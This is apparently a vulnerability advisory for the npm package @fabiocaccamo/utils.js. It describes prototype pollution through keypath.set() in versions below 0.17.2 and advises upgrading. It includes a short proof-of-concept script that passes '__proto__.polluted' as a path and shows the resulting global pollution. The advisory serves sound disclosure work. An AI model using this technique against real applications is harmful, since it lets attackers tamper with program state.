Vulnerability	Vulnerable Version
H Prototype Pollution @fabiocaccamo/utils.js is a JavaScript utils for lazy devs. Affected versions of this package are vulnerable to Prototype Pollution via the `set()` and method, which merges the `path` and `value` parameters based on the key:value. ###PoC const utils = require("@fabiocaccamo/utils.js"); const obj = {}; const fake_obj = {}; console.log(`[+] Before prototype pollution : ${obj.polluted}`); utils.object.keypath.set(fake_obj, '__proto__.polluted', true); console.log(`[+] After prototype pollution : ${obj.polluted}`); /* [+] Before prototype pollution : undefined [+] After prototype pollution : true */ How to fix Prototype Pollution? Upgrade `@fabiocaccamo/utils.js` to version 0.17.2 or higher.	<0.17.2

Prototype Pollution

@fabiocaccamo/utils.js is a JavaScript utils for lazy devs.

Affected versions of this package are vulnerable to Prototype Pollution via the set() and method, which merges the path and value parameters based on the key:value.

###PoC

const utils = require("@fabiocaccamo/utils.js");
const obj = {};
const fake_obj = {};

console.log(`[+] Before prototype pollution : ${obj.polluted}`);
utils.object.keypath.set(fake_obj, '__proto__.polluted', true);
console.log(`[+] After prototype pollution : ${obj.polluted}`);

/* 
[+] Before prototype pollution : undefined
[+] After prototype pollution : true
*/

How to fix Prototype Pollution?

Upgrade @fabiocaccamo/utils.js to version 0.17.2 or higher.

<0.17.2

Go back to all versions of this package